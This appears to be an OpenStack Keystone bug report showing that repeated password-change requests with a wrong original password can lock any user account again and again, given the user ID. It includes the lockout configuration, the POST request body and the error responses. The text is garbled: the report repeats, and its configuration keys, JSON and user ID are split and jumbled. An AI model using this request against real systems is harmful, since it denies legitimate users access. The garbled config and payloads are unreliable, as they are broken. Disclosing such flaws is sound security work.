As the original password is wrong (as the attacker do not know it), after lockout_failure_attempts attempts that user account get locked out by lockout_duration.
Before lockout_failure_attempts attempts, you get:
{
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The request you have made requires authentication."
}
}
After lockout_failure_attempts attempts, you get:
{
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The account is locked for user: 94ab353983174b04955fc9842779b085."
}
}
This can be used by an attacker to lock out users (if they have access to user IDs) indefinitely by locking out users again and again after lockout_duration has passed.
This relates to PCI DSS features added in the Newton release.
keystone.conf: compliance] failure_ attempts = 2
[security_
# Setting the account lockout threshold
lockout_
lockout_duration = 10
Try to change a user's password on their behalf:
POST /v3/users/ <user_id> /password password" : "fake_password",
{
"user": {
"original_
"password": "new_password"
}
}
As the original password is wrong (as the attacker do not know it), after lockout_ failure_ attempts attempts that user account get locked out by lockout_duration.
Before lockout_ failure_ attempts attempts, you get:
{
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The request you have made requires authentication."
}
}
After lockout_ failure_ attempts attempts, you get:
{ 4955fc9842779b0 85."
"error": {
"code": 401,
"title": "Unauthorized",
"message": "The account is locked for user: 94ab353983174b0
}
}
This can be used by an attacker to lock out users (if they have access to user IDs) indefinitely by locking out users again and again after lockout_duration has passed.